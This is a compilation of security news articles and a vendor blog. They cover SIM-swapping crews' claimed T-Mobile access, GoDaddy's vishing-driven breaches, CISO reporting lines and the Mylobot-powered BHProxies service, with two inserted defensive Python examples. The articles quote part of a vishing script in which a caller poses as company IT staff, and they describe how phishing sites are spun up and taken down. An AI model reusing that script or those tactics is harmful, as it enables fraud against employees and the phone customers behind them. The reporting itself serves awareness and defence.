Hackers Claim They Breached T-Mobile More Than 100 Times in 2022


Three different cybercriminal groups claimed access to internal networks at communications giant T-Mobile in more than 100 separate incidents throughout 2022, new data suggests. In each case, the goal of the attackers was the same: Phish T-Mobile employees for access to internal company tools, and then convert that access into a cybercrime service that could be hired to divert any T-Mobile user’s text messages and phone calls to another device.

The conclusions above are based on an extensive analysis of Telegram chat logs from three distinct cybercrime groups or actors that have been identified by security researchers as particularly active in and effective at “SIM-swapping,” which involves temporarily seizing control over a target’s mobile phone number.

Countless websites and online services use SMS text messages for both password resets and multi-factor authentication. This means that stealing someone’s phone number often can let cybercriminals hijack the target’s entire digital life in short order — including access to any financial, email and social media accounts tied to that phone number.

All three SIM-swapping entities that were tracked for this story remain active in 2023, and they all conduct business in open channels on the instant messaging platform Telegram. KrebsOnSecurity is not naming those channels or groups here because they will simply migrate to more private servers if exposed publicly, and for now those servers remain a useful source of intelligence about their activities.

Each advertises their claimed access to T-Mobile systems in a similar way. At a minimum, every SIM-swapping opportunity is announced with a brief “Tmobile up!” or “Tmo up!” message to channel participants. The announcements also typically include the price of a single SIM-swap request and the handle of the person who takes the payment and the details of the targeted subscriber.

The information required from the customer of the SIM-swapping service includes the target’s phone number and the serial number (the ICCID) of the new SIM card that will receive the text messages and phone calls sent to the hijacked phone number.

Initially, the goal of this project was to count how many times each entity claimed access to T-Mobile throughout 2022, by cataloging the various “Tmo up!” posts from each day and working backwards from Dec. 31, 2022.

But by the time we got to claims made in the middle of May 2022, completing the rest of the year’s timeline seemed unnecessary. The tally shows that in the last seven-and-a-half months of 2022, these groups collectively made SIM-swapping claims against T-Mobile on 104 separate days — often with multiple groups claiming access on the same days.

The 104 days in the latter half of 2022 in which different known SIM-swapping groups claimed access to T-Mobile employee tools.

KrebsOnSecurity shared a large amount of data gathered for this story with T-Mobile. The company declined to confirm or deny any of these claimed intrusions. But in a written statement, T-Mobile said this type of activity affects the entire wireless industry.

“And we are constantly working to fight against it,” the statement reads. “We have continued to drive enhancements that further protect against unauthorized access, including enhancing multi-factor authentication controls, hardening environments, limiting access to data, apps or services, and more. We are also focused on gathering threat intelligence data, like what you have shared, to help further strengthen these ongoing efforts.”


While it is true that each of these cybercriminal actors periodically offers SIM-swapping services for other mobile phone providers — including AT&T, Verizon and smaller carriers — those solicitations appear far less frequently in these group chats than T-Mobile swap offers. And when those offers do materialize, they are considerably more expensive.

The prices advertised for a SIM-swap against T-Mobile customers in the latter half of 2022 ranged between USD $1,000 and $1,500, while SIM-swaps offered against AT&T and Verizon customers often cost well more than twice that amount.

To be clear, KrebsOnSecurity is not aware of specific SIM-swapping incidents tied to any of these breach claims. However, the vast majority of advertisements for SIM-swapping claims against T-Mobile tracked in this story had two things in common that set them apart from random SIM-swapping ads on Telegram.

First, they included an offer to use a mutually trusted “middleman” or escrow provider for the transaction (to protect either party from getting scammed). More importantly, the cybercriminal handles that were posting ads for SIM-swapping opportunities from these groups generally did so on a daily or near-daily basis — often teasing their upcoming swap events in the hours before posting a “Tmo up!” message announcement.

In other words, if the crooks offering these SIM-swapping services were ripping off their customers or claiming to have access that they didn’t, this would be almost immediately obvious from the responses of the more seasoned and serious cybercriminals in the same chat channel.

There are plenty of people on Telegram claiming to have SIM-swap access at major telecommunications firms, but a great many such offers are simply four-figure scams, and any pretenders on this front are soon identified and banned (if not worse).

One of the groups that reliably posted “Tmo up!” messages to announce SIM-swap availability against T-Mobile customers also reliably posted “Tmo down!” follow-up messages announcing exactly when their claimed access to T-Mobile employee tools was discovered and revoked by the mobile giant.

A review of the timestamps associated with this group’s incessant “Tmo up” and “Tmo down” posts indicates that while their claimed access to employee tools usually lasted less than an hour, in some cases that access apparently went undiscovered for several hours or even days.
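The timestamp review described above can be scripted. The following is an added example (not code from the article) that pairs each “Tmo up!” post in a Telegram chat export with the same poster’s next “Tmo down!” and reports how long each claimed access window lasted and on how many distinct days access was claimed. It assumes the channel was saved with Telegram Desktop’s JSON chat export, where the top-level object has a “messages” list and each message carries a “date” (ISO 8601) and a “text” field that is either a string or, for formatted posts, a list of strings and entity dicts; the export embedded below is constructed for illustration and is not real channel data.

```python
"""Added example (not the article's code): pair each "Tmo up!" announcement in a
Telegram chat export with the same poster's next "Tmo down!" and measure how long
the claimed access lasted, plus on how many distinct days access was claimed.
Assumes the channel was saved with Telegram Desktop's JSON export, where the
top-level object has a "messages" list and each message carries "date" (ISO 8601)
and "text" (a string, or a list of strings and entity dicts for formatted posts).
The export below is constructed for illustration; it is not real channel data.
"""
import json
import re
import statistics
from datetime import datetime

UP_RE = re.compile(r"\btmo(?:bile)?\s+up\b", re.IGNORECASE)
DOWN_RE = re.compile(r"\btmo(?:bile)?\s+down\b", re.IGNORECASE)

# Constructed sample in the shape of a Telegram Desktop JSON export (assumption).
SAMPLE_EXPORT = json.dumps({"name": "constructed channel", "type": "public_channel", "messages": [
    {"id": 1, "type": "message", "date": "2022-11-14T21:02:00", "from": "a", "text": "tmo soon, get ur mm ready"},
    {"id": 2, "type": "message", "date": "2022-11-14T22:05:00", "from": "a", "text": "Tmo up! 1.5k"},
    {"id": 3, "type": "message", "date": "2022-11-14T22:18:00", "from": "a", "text": "Tmo down!"},
    {"id": 4, "type": "message", "date": "2022-11-15T03:40:00", "from": "b",
     "text": [{"type": "bold", "text": "Tmobile up"}, " dm for pricing"]},
    {"id": 5, "type": "message", "date": "2022-11-15T09:15:00", "from": "b", "text": "tmo down"},
    {"id": 6, "type": "message", "date": "2022-12-02T17:00:00", "from": "a", "text": "Tmo up!"},
    {"id": 7, "type": "message", "date": "2022-12-02T17:12:00", "from": "a", "text": "Tmo up! still live"},
    {"id": 8, "type": "message", "date": "2022-12-02T17:14:00", "from": "a", "text": "tmo down"},
    {"id": 9, "type": "message", "date": "2022-12-31T11:00:00", "from": "a", "text": "TMO UP"},
]})

def flatten_text(text):
    """Formatted Telegram messages are exported as a list of strings and entity dicts."""
    if isinstance(text, str):
        return text
    return "".join(p if isinstance(p, str) else p.get("text", "") for p in text)

def classify(text):
    t = flatten_text(text)
    if DOWN_RE.search(t):
        return "down"
    return "up" if UP_RE.search(t) else None

def extract_sessions(export_json):
    """Return (poster, up_time, down_time_or_None) per claimed access window. Repeated
    "up" posts before a "down" belong to the same window; an "up" never followed by a
    "down" is reported with down_time None."""
    data = json.loads(export_json)
    msgs = sorted((m for m in data["messages"] if m.get("type") == "message"), key=lambda m: m["date"])
    open_windows, sessions = {}, []
    for m in msgs:
        kind = classify(m.get("text", ""))
        if kind is None:
            continue
        poster, ts = m.get("from", "?"), datetime.fromisoformat(m["date"])
        if kind == "up":
            open_windows.setdefault(poster, ts)   # keep the first "up" of the window
        elif poster in open_windows:
            sessions.append((poster, open_windows.pop(poster), ts))
    sessions += [(p, start, None) for p, start in open_windows.items()]
    return sorted(sessions, key=lambda s: s[1])

def summarize(sessions):
    minutes = [(end - start).total_seconds() / 60 for _, start, end in sessions if end is not None]
    return {
        "claimed_days": len({start.date() for _, start, _ in sessions}),
        "closed_windows": len(minutes),
        "unclosed_windows": sum(1 for s in sessions if s[2] is None),
        "median_minutes": statistics.median(minutes) if minutes else None,
        "max_minutes": max(minutes) if minutes else None,
        "under_15_minutes": sum(1 for mnt in minutes if mnt < 15),
    }

if __name__ == "__main__":
    print(summarize(extract_sessions(SAMPLE_EXPORT)))
```

Pairing is done per poster rather than per channel so that two groups announcing on the same day do not close each other’s windows; the teaser post in the sample (“tmo soon”) is deliberately not matched, since the article notes such teasers precede the real “Tmo up!” by hours.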


How could these SIM-swapping groups be gaining access to T-Mobile’s network as frequently as they claim? Peppered throughout the daily chit-chat on their Telegram channels are solicitations for people urgently needed to serve as “callers,” or those who can be hired to social engineer employees over the phone into navigating to a phishing website and entering their employee credentials.

Allison Nixon is chief research officer for the New York City-based cybersecurity firm Unit 221B. Nixon said these SIM-swapping groups will typically call employees on their mobile devices, pretend to be someone from the company’s IT department, and then try to get the person on the other end of the line to visit a phishing website that mimics the company’s employee login page.

Nixon argues that many people in the security community tend to discount the threat from voice phishing attacks as somehow “low tech” and “low probability” threats.

“I see it as not low-tech at all, because there are a lot of moving parts to phishing these days,” Nixon said. “You have the caller who has the employee on the line, and the person operating the phish kit who needs to spin it up and down fast enough so that it doesn’t get flagged by security companies. Then they have to get the employee on that phishing site and steal their credentials.”

In addition, she said, often there will be yet another co-conspirator whose job it is to use the stolen credentials and log into employee tools. That person may also need to figure out how to make their device pass “posture checks,” a form of device authentication that some companies use to verify that each login is coming only from employee-issued phones or laptops.

For aspiring criminals with little experience in scam calling, there are plenty of sample call transcripts available on these Telegram chat channels that walk one through how to impersonate an IT technician at the targeted company — and how to respond to pushback or skepticism from the employee. Here’s a snippet from one such tutorial that appeared recently in one of the SIM-swapping channels:

“Hello this is James calling from Metro IT department, how’s your day today?”

(yea im doing good, how r u)

i’m doing great, thank you for asking

i’m calling in regards to a ticket we got last week from you guys, saying you guys were having issues with the network connectivity which also interfered with [Microsoft] Edge, not letting you sign in or disconnecting you randomly. We haven’t received any updates to this ticket ever since it was created so that’s why I’m calling in just to see if there’s still an issue or not….”


The TMO UP data referenced above, combined with comments from the SIM-swappers themselves, indicate that while many of their claimed accesses to T-Mobile tools in the middle of 2022 lasted hours on end, both the frequency and duration of these events began to steadily decrease as the year wore on.

T-Mobile declined to discuss what it may have done to combat these apparent intrusions last year. However, one of the groups began to complain loudly in late October 2022 that T-Mobile must have been doing something that was causing their phished access to employee tools to die very soon after they obtained it.

One group even remarked that they suspected T-Mobile’s security team had begun monitoring their chats.

Indeed, the timestamps associated with one group’s TMO UP/TMO DOWN notices show that their claimed access was often limited to less than 15 minutes throughout November and December of 2022.

Whatever the reason, the calendar graphic above clearly shows that the frequency of claimed access to T-Mobile decreased significantly across all three SIM-swapping groups in the waning weeks of 2022.


T-Mobile US reported revenues of nearly $80 billion last year. It currently employs more than 71,000 people in the United States, any one of whom can be a target for these phishers.

T-Mobile declined to answer questions about what it may be doing to beef up employee authentication. But Nicholas Weaver, a researcher and lecturer at University of California, Berkeley’s International Computer Science Institute, said T-Mobile and all the major wireless providers should be requiring employees to use physical security keys for that second factor when logging into company resources.

A U2F device made by Yubikey.

“These breaches should not happen,” Weaver said. “Because T-Mobile should have long ago issued all employees security keys and switched to security keys for the second factor. And because security keys provably block this style of attack.”

The most commonly used security keys are inexpensive USB-based devices. A security key implements a form of multi-factor authentication known as Universal 2nd Factor (U2F), which allows the user to complete the login process simply by inserting the USB key and pressing a button on the device. The key works without the need for any special software drivers.

What makes security keys attractive for multi-factor authentication is that the key’s response is bound to the site that requested it. The browser records the origin of the page making the request, and the key signs over that origin (in U2F, the application ID; in its successor, FIDO2/WebAuthn, the relying-party ID and the origin in the client data). A credential registered for the employer’s domain is not offered to a page on another domain, and a response produced on an impostor site carries the impostor’s origin and fails verification at the employer’s real login. Thus the second factor cannot be phished, either over the phone or over the Internet.


Nixon said one confounding aspect of SIM-swapping is that these criminal groups tend to recruit teenagers to do their dirty work.

“A huge reason this problem has been allowed to spiral out of control is because children play such a prominent role in this form of breach,” Nixon said.

Nixon said SIM-swapping groups often advertise low-level jobs on places like Roblox and Minecraft, online games that are extremely popular with young adolescent males.

“Statistically speaking, that kind of recruiting is going to produce a lot of people who are underage,” she said. “They recruit children because they’re naive, you can get more out of them, and they have legal protections that other people over 18 don’t have.”

For example, she said, even when underage SIM-swappers are arrested, the offenders tend to go right back to committing the same crimes as soon as they’re released.

In January 2023, T-Mobile disclosed that a “bad actor” stole records on roughly 37 million current customers, including their name, billing address, email, phone number, date of birth, and T-Mobile account number.

In August 2021, T-Mobile acknowledged that hackers made off with the names, dates of birth, Social Security numbers and driver’s license/ID information on more than 40 million current, former or prospective customers who applied for credit with the company. That breach came to light after a hacker began selling the records on a cybercrime forum.

In the shadow of such mega-breaches, any damage from the continuous attacks by these SIM-swapping groups can seem insignificant by comparison. But Nixon says it’s a mistake to dismiss SIM-swapping as a low volume problem.

“Logistically, you may only be able to get a few dozen or a hundred SIM-swaps in a day, but you can pick any customer you want across their entire customer base,” she said. “Just because a targeted account takeover is low volume doesn’t mean it’s low risk. These guys have crews that go and identify people who are high net worth individuals and who have a lot to lose.”

Nixon said another aspect of SIM-swapping that causes cybersecurity defenders to dismiss the threat from these groups is the perception that they are full of low-skilled “script kiddies,” a derisive term used to describe novice hackers who rely mainly on point-and-click hacking tools.

“They underestimate these actors and say this person isn’t technically sophisticated,” she said. “But if you’re rolling around in millions worth of stolen cryptocurrency, you can buy that sophistication. I know for a fact some of these compromises were at the hands of these ‘script kiddies,’ but they’re not ripping off other people’s scripts so much as hiring people to make scripts for them. And they don’t care what gets the job done, as long as they get to steal the money.”

Navigating the CISO Reporting Structure | Best Practices for Empowering Security Leaders

In the face of ever-increasing cyberattacks and data breaches, the need for experienced security professionals to helm security operations has risen as a top focus for many enterprise organizations. Chief Information Security Officers (CISOs) are now considered a critical role within senior leadership, but there are varied opinions on where they fit into the overall reporting structure.

As the role of a CISO has evolved, there have been many discussions about whom the CISO should report to. In most cases, a CISO generally reports to the Chief Information Officer (CIO); however, many argue that CISOs should not report to CIOs. This blog post explores ways that CIOs can better empower CISOs and help drive cybersecurity priorities within their organization.

Examining the Shared Journey Between Two Points

Let’s imagine an organization as a vehicle driving from point A to point B and beyond as they establish their brand, grow their customer base, and continuously scale up.

CIOs, in this analogy, are busy laying the road upon which the vehicle travels. They work to build the smoothest, most cost-effective road, allowing the “driver” – the employees of the organization – to get where they are going faster than other “cars”. To do so, CIOs invest in leading-edge technologies that help employees work better and champion an ongoing process of digital transformation.

If the CIO is paving the way in this journey, the CISO makes sure that the vehicle is safe to operate, tuned, and regularly maintained to run without issue. A CISO’s objective is to ensure the vehicle can get to point B and beyond in a safe manner, protecting both the car and its driver from external dangers.

To achieve this, CISOs are responsible for building business-specific security policies, finding ways to reduce overall cyber risk, and building up cyber resilience through people, process, and the right technology.

Though CIOs’ and CISOs’ responsibilities are distinct, they share a similar objective: to enable the organization to grow and operate in a safe, streamlined way.

Role Relationships | How CIOs Can Enable CISOs

The role of CISOs has evolved in recent years to keep up with a rapidly changing threat landscape and moving goalposts dependent on an organization’s industry. Though traditionally this role has reported to a company’s CIO, some in the cyber community have questioned whether this drives or hinders an organization’s ability to prioritize cybersecurity needs.

The focus, however, should instead be on examining the key responsibilities of both roles, analyzing common conflicts of interest that arise between them, and finally, understanding how both CISOs and CIOs can work in tandem to enable business operations and cybersecurity.

Below, we examine three shared functional areas that each role manages differently and where there is room for alignment.

1. Managing Conflicting Priorities

Looking at the fundamental objectives of CIOs in contrast with CISOs, CIOs focus on enabling the business with a better customer experience, digital transformation, cost savings, IT efficiency, and seamless IT operations. CIOs are tasked with providing uninterrupted service to the organization’s employees to support continuous operations and sales.

On the other hand, a CISO’s job is centered around reducing the risk of unauthorized access and disruption, and maintaining the integrity of the organization’s technology. For CISOs, it’s more about how securely data is stored, accessed, and transmitted.

For example, suppose a business user wishes to use a new application that enables them to complete their work in less time than before. The CIO office might approve this request as the intention is to cater to the business user’s needs. However, the CISO office would need to evaluate the risks spanning governance, access, data, and backups before approving this request.

The CIO office and the business user may push the CISO to approve the application. This is a single, application-level situation; repeated at scale, it shows how the CIO’s decision tends to prevail over the CISO’s concerns.

Opportunities for Alignment

CISOs can be empowered when they are recognized as the voice of authority on security for the organization and collaborate as an equal to the CIO. Sharing knowledge, both CIOs and CISOs can identify areas needing improvement and work together to a common goal.

2. Understanding Budget Prioritization & Justifications

CISOs are responsible for mitigating risks brought about by legacy IT infrastructures and will often take additional measures to secure them. In organizations where the CISO reports into the CIO, the cybersecurity budget is a subset of the greater IT budget.

This situation creates a perception that security is expensive compared to IT infrastructure when, in reality, the expense can be traced back to the additional measures taken to mitigate the risks that the IT infrastructure itself introduces.

For CIOs to better support CISOs, the budgetary distinction and separation from the IT department are essential for the following reasons:

  1. From a people perspective: Security training needs to be updated or modified based on the changes in the cyber threat landscape to ensure employees are able to recognize emerging phishing attacks.
  2. From a process perspective: There is a need for flexibility due to organizational priorities, market changes, or emerging cyberattacks. For example, changing risk appetites may suddenly highlight the need for an incident retainer.
  3. From a technology perspective: Due to global digitization and growing use of cloud applications, there is a need for new tools to better monitor and detect attacks in less time.

Opportunities for Alignment

Though a CISO may report into a CIO within an organization, senior leadership may choose to separate the IT budget from the cybersecurity budget. While the budgets are divided, it is critical for the CIO and CISO to work collaboratively, brainstorming to understand where they can align on business objectives to streamline expenses on both sides.

Further, CISOs reporting into CIOs can show the cost benefits of taking a proactive, preventative approach to the organization’s security. By sharing their expertise, a CISO can help CIOs build safer, more effective IT strategies and embed preventative security measures in every layer of the organization.

3. Prioritizing Business Risks

Without transparency and open communication between a CISO and CIO, preventative actions taken to ward off security incidents may be interpreted as a cost center, rather than a way to enable the business.

Moreover, CIOs that are not fully in tune with CISOs may not accurately represent data around cyber incidents to board members. Instead of reporting on how many times the security team responded to events, the narrative may focus on missed alerts or portray investment in new solutions as a cost center.

Opportunities for Alignment

CIOs are positioned to understand security risks from a wide IT standpoint, as they oversee relationships with vendors, contractors, and other service providers. When evaluating third-party risks, CIOs can supply CISOs with valuable intel about these relationships and help form realistic and achievable security standards.

A benefit of having a CISO report into a CIO is the recognition that usability and security are not at odds. Transparency and open collaboration between the two roles support the goal of building cybersecurity hygiene, so that security risks can be evaluated and mitigated throughout the organization’s IT infrastructure.


A strong partnership between a CISO and CIO, regardless of reporting structure, maximizes an organization’s security and IT posture. The key is that the CIO and CISO must align on the business objectives of the organization. A CIO enabling the business through cutting-edge technology is most effective when that work is augmented by the CISO’s.

Returning to our earlier analogy, if a vehicle isn’t safe to drive, it may not get very far even if the road ahead is a smooth one. Should the pathway be fraught with obstacles, even a well-tuned car would find the journey a difficult one. Working hand in hand, the business is able to take carefully calculated risks to gain long-term competitive advantage. The maximum value for CISO and CIO is derived when cybersecurity is treated as a strategic risk.

Though there is no one-size-fits-all approach and leaders have to consider factors including industry, culture, and cybersecurity maturity, board members and C-suite teams that choose to empower CISOs through transparency and partnership are better positioned to protect their organization against changing cybersecurity threats and establish a much stronger cyber hygiene posture in the long run.


When Low-Tech Hacks Cause High-Impact Breaches

Web hosting giant GoDaddy made headlines this month when it disclosed that a multi-year breach allowed intruders to steal company source code, siphon customer and employee login credentials, and foist malware on customer websites. Media coverage understandably focused on GoDaddy’s admission that it suffered three different cyberattacks over as many years at the hands of the same hacking group. But it’s worth revisiting how this group typically got into targeted companies: by calling employees and tricking them into navigating to a phishing website.

In a filing with the U.S. Securities and Exchange Commission (SEC), GoDaddy said it determined that the same “sophisticated threat actor group” was responsible for three separate intrusions, including:

-March 2020: A spear-phishing attack on a GoDaddy employee compromised the hosting login credentials of approximately 28,000 GoDaddy customers, as well as login credentials for a small number of employees;

-November 2021: A compromised GoDaddy password let attackers steal source code and information tied to 1.2 million customers, including website administrator passwords, sFTP credentials, and private SSL keys;

-December 2022: Hackers gained access to and installed malware on GoDaddy’s cPanel hosting servers that “intermittently redirected random customer websites to malicious sites.”

“Based on our investigation, we believe these incidents are part of a multi-year campaign by a sophisticated threat actor group that, among other things, installed malware on our systems and obtained pieces of code related to some services within GoDaddy,” the company stated in its SEC filing.

What else do we know about the cause of these incidents? We don’t know much about the source of the November 2021 incident, other than GoDaddy’s statement that it involved a compromised password, and that it took about two months for the company to detect the intrusion. GoDaddy has not disclosed the source of the breach in December 2022 that led to malware on some customer websites.

But we do know the March 2020 attack was precipitated by a spear-phishing attack against a GoDaddy employee. GoDaddy described the incident at the time in general terms as a social engineering attack, but one of its customers affected by that March 2020 breach actually spoke to one of the hackers involved.

The hackers were able to change the Domain Name System (DNS) records for the transaction brokering site escrow.com so that it pointed to an address in Malaysia that was host to just a few other domains, including the then brand-new phishing domain servicenow-godaddy[.]com.

The general manager of Escrow.com found himself on the phone with one of the GoDaddy hackers, after someone who claimed they worked at GoDaddy called and said they needed him to authorize some changes to the account.

In reality, the caller had just tricked a GoDaddy employee into giving away their credentials, and he could see from the employee’s account that Escrow.com required a specific security procedure to complete a domain transfer.

The general manager of Escrow.com said he suspected the call was a scam, but decided to play along for about an hour — all the while recording the call and coaxing information out of the scammer.

“This guy had access to the notes, and knew the number to call,” to make changes to the account, the CEO of Escrow.com told KrebsOnSecurity. “He was literally reading off the tickets to the notes of the admin panel inside GoDaddy.”

About halfway through this conversation — after being called out by the general manager as an imposter — the hacker admitted that he was not a GoDaddy employee, and that he was in fact part of a group that enjoyed repeated success with social engineering employees at targeted companies over the phone.

Absent from GoDaddy’s SEC statement is another spate of attacks in November 2020, in which unknown intruders redirected email and web traffic for multiple cryptocurrency services that used GoDaddy in some capacity.

It is possible this incident was not mentioned because it was the work of yet another group of intruders. But in response to questions from KrebsOnSecurity at the time, GoDaddy said that incident also stemmed from a “limited” number of GoDaddy employees falling for a sophisticated social engineering scam.

“As threat actors become increasingly sophisticated and aggressive in their attacks, we are constantly educating employees about new tactics that might be used against them and adopting new security measures to prevent future attacks,” GoDaddy said in a written statement back in 2020.

Voice phishing or “vishing” attacks typically target employees who work remotely. The phishers will usually claim that they’re calling from the employer’s IT department, supposedly to help troubleshoot some issue. The goal is to convince the target to enter their credentials at a website set up by the attackers that mimics the organization’s corporate email or VPN portal.

Experts interviewed for an August 2020 story on a steep rise in successful voice phishing attacks said there are generally at least two people involved in each vishing scam: One who is social engineering the target over the phone, and another co-conspirator who takes any credentials entered at the phishing page — including multi-factor authentication codes shared by the victim — and quickly uses them to log in to the company’s website.

The attackers are usually careful to do nothing with the phishing domain until they are ready to initiate a vishing call to a potential victim. And when the attack or call is complete, they disable the website tied to the domain.

This is key because many domain registrars will only respond to external requests to take down a phishing website if the site is live at the time of the abuse complaint. This tactic also can stymie efforts by companies that focus on identifying newly-registered phishing domains before they can be used for fraud.

A U2F device made by Yubikey.

GoDaddy’s latest SEC filing indicates the company had nearly 7,000 employees as of December 2022. In addition, GoDaddy contracts with another 3,000 people who work full-time for the company via business process outsourcing companies based primarily in India, the Philippines and Colombia.

Many companies now require employees to supply a one-time password — such as one sent via SMS or produced by a mobile authenticator app — in addition to their username and password when logging in to company assets online. But both SMS and app-based codes can be undermined by phishing attacks that simply request this information in addition to the user’s password.

One multifactor option — physical security keys — appears to be immune to these advanced scams. The most commonly used security keys are inexpensive USB-based devices. A security key implements a form of multi-factor authentication known as Universal 2nd Factor (U2F), which allows the user to complete the login process simply by inserting the USB device and pressing a button on the device. The key works without the need for any special software drivers.

What makes security keys attractive for multi-factor authentication is that the key’s response is bound to the site that requested it. The browser records the origin of the page making the request, and the key signs over that origin (in U2F, the application ID; in its successor, FIDO2/WebAuthn, the relying-party ID and the origin in the client data). A credential registered for the employer’s domain is not offered to a page on another domain, and a response produced on an impostor site carries the impostor’s origin and fails verification at the employer’s real login. Thus the second factor cannot be phished, either over the phone or over the Internet.

In July 2018, Google disclosed that it had not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of one-time codes.
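Both this article and the T-Mobile piece above explain the security-key property in prose; the following added example (not code from either article, nor from any FIDO library) plays out the mechanism so the failure of a phishing relay can be observed directly. It models the three parties of a U2F/WebAuthn login in plain Python under stated simplifications: HMAC-SHA256 stands in for the ECDSA P-256 signature a real key produces, with the relying party holding the same secret in place of the key’s public key, so that only the standard library is needed; authenticator data is reduced to the RP ID hash; and the hosts employer.example and sso-employer-helpdesk.example are invented.

```python
"""Added example (not the articles' or any FIDO library's code): why a security
key's response cannot be phished. Models the three parties of a U2F/WebAuthn
login in plain Python. Assumptions: HMAC-SHA256 stands in for the key's ECDSA
P-256 signature, with the relying party holding the same secret instead of a
public key, so only the standard library is needed; authenticator data is reduced
to the RP ID hash; employer.example and sso-employer-helpdesk.example are invented.
"""
import hashlib, hmac, json, os
from urllib.parse import urlparse

def sha256(b):
    return hashlib.sha256(b).digest()

class Authenticator:
    """Roaming security key: a credential is scoped to the RP ID it was made for."""
    def __init__(self):
        self.creds = {}  # credential_id -> (rp_id, secret)

    def make_credential(self, rp_id):
        cred_id, secret = os.urandom(16), os.urandom(32)
        self.creds[cred_id] = (rp_id, secret)
        return cred_id, secret  # secret stands in for the public key (assumption)

    def get_assertion(self, rp_id, client_data_hash):
        for cred_id, (cred_rp, secret) in self.creds.items():
            if cred_rp == rp_id:
                auth_data = sha256(rp_id.encode())  # rpIdHash
                return cred_id, auth_data, hmac.new(secret, auth_data + client_data_hash, "sha256").digest()
        raise LookupError(f"no credential for RP ID {rp_id!r}")

class Browser:
    """The part a phisher does not control: it records the origin of the page that
    asked and refuses RP IDs that page is not entitled to."""
    def __init__(self, authenticator):
        self.key = authenticator

    def request_assertion(self, page_origin, rp_id, challenge):
        host = urlparse(page_origin).hostname or ""
        if not (host == rp_id or host.endswith("." + rp_id)):
            raise PermissionError(f"{page_origin} may not use RP ID {rp_id!r}")
        client_data = json.dumps({"type": "webauthn.get", "challenge": challenge.hex(),
                                  "origin": page_origin}, sort_keys=True).encode()
        cred_id, auth_data, sig = self.key.get_assertion(rp_id, sha256(client_data))
        return {"credential_id": cred_id, "client_data": client_data,
                "auth_data": auth_data, "signature": sig}

class RelyingParty:
    def __init__(self, rp_id, origin):
        self.rp_id, self.origin, self.keys, self.challenges = rp_id, origin, {}, set()

    def new_challenge(self):
        c = os.urandom(32)
        self.challenges.add(c)
        return c

    def verify(self, a):
        # Each check is one a real relying party performs on an assertion.
        secret = self.keys.get(a["credential_id"])
        cd = json.loads(a["client_data"])
        challenge = bytes.fromhex(cd.get("challenge", ""))
        if secret is None or cd.get("type") != "webauthn.get" or challenge not in self.challenges:
            return False
        if cd.get("origin") != self.origin:                    # the origin-binding check
            return False
        if a["auth_data"] != sha256(self.rp_id.encode()):       # rpIdHash check
            return False
        expected = hmac.new(secret, a["auth_data"] + sha256(a["client_data"]), "sha256").digest()
        if not hmac.compare_digest(expected, a["signature"]):
            return False
        self.challenges.discard(challenge)                      # single use
        return True

def setup():
    key, rp = Authenticator(), RelyingParty("employer.example", "https://sso.employer.example")
    cred_id, secret = key.make_credential(rp.rp_id)             # enrollment
    rp.keys[cred_id] = secret
    return key, Browser(key), rp

def legitimate_login():
    key, browser, rp = setup()
    return rp.verify(browser.request_assertion(rp.origin, rp.rp_id, rp.new_challenge()))

def phishing_attempt():
    """The vished employee is on the impostor page, which relays the real challenge."""
    key, browser, rp = setup()
    challenge, phish, out = rp.new_challenge(), "https://sso-employer-helpdesk.example", {}
    try:  # 1. The impostor page asks for the employer's RP ID: the browser refuses.
        browser.request_assertion(phish, rp.rp_id, challenge)
        out["browser_refused"] = False
    except PermissionError:
        out["browser_refused"] = True
    try:  # 2. It asks with its own RP ID: the key holds no credential for it.
        browser.request_assertion(phish, "sso-employer-helpdesk.example", challenge)
        out["key_refused"] = False
    except LookupError:
        out["key_refused"] = True
    # 3. A tampered client that skips the browser check still gets a signature over
    #    clientData naming the phishing origin, so the RP rejects it, and editing
    #    the origin afterwards breaks the signature.
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge.hex(),
                              "origin": phish}, sort_keys=True).encode()
    cred_id, auth_data, sig = key.get_assertion(rp.rp_id, sha256(client_data))
    forged = {"credential_id": cred_id, "client_data": client_data, "auth_data": auth_data, "signature": sig}
    out["relayed_rejected"] = not rp.verify(forged)
    forged["client_data"] = client_data.replace(phish.encode(), rp.origin.encode())
    out["edited_rejected"] = not rp.verify(forged)
    return out
```

Contrast this with an SMS or app-generated code, which is just a string the victim can read out to the caller: nothing in that string says which site it was meant for, so the relying party has no way to tell a relayed code from a genuine one. Here the origin check and the signature over the client data are exactly what the phisher cannot forge.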

Who’s Behind the Botnet-Based Service BHProxies?

A security firm has discovered that a six-year-old crafty botnet known as Mylobot appears to be powering a residential proxy service called BHProxies, which offers paying customers the ability to route their web traffic anonymously through compromised computers. Here’s a closer look at Mylobot, and a deep dive into who may be responsible for operating the BHProxies service.

The BHProxies website.

First identified in 2017 by the security firm Deep Instinct, Mylobot employs a number of fairly sophisticated methods to remain undetected on infected hosts, such as running only in the computer’s memory rather than from files on disk, and waiting 14 days before attempting to contact the botnet’s command and control servers.

Last year, researchers at Minerva Labs spotted the botnet being used to blast out sextortion scams. But according to a new report from BitSight, the Mylobot botnet’s main functionality has always been about transforming the infected system into a proxy.

The Mylobot malware includes more than 1,000 hard-coded and encrypted domain names, any one of which can be registered and used as control networks for the infected hosts. BitSight researchers found significant overlap in the Internet addresses used by those domains and a domain called BHproxies[.]com.

BHProxies sells access to “residential proxy” networks, which allow someone to rent a residential IP address to use as a relay for their Internet communications, providing anonymity and the advantage of being perceived as a residential user surfing the web. The service is currently advertising access to more than 150,000 devices globally.

“At this point, we cannot prove that BHProxies is linked to Mylobot, but we have a strong suspicion,” wrote BitSight’s Stanislas Arnoud.

To test their hypothesis, BitSight obtained 50 proxies from BHProxies. The researchers were able to use 48 of those 50 proxies to browse to a website they controlled — allowing them to record the true IP addresses of each proxy device.

“Among these 48 recovered residential proxies IP addresses, 28 (58.3%) of those were already present in our sinkhole systems, associated with the Mylobot malware family,” Arnoud continued. “This number is probably higher, but we don’t have a full visibility of the botnet. This gave us clear evidence that Mylobot infected computers are used by the BHProxies service.”

BitSight said it is currently seeing more than 50,000 unique Mylobot infected systems every day, and that India appears to be the most targeted country, followed by the United States, Indonesia and Iran.

“We believe we are only seeing part of the full botnet, which may lead to more than 150,000 infected computers as advertised by BHProxies’ operators,” Arnoud wrote.


The website BHProxies[.]com has been advertised for nearly a decade on the forum Black Hat World by the user BHProxies. BHProxies has authored 129 posts on Black Hat World since 2012, and their last post on the forum was in December 2022.

BHProxies initially was fairly active on Black Hat World between May and November 2012, after which it suddenly ceased all activity. The account didn’t resume posting on the forum until April 2014.

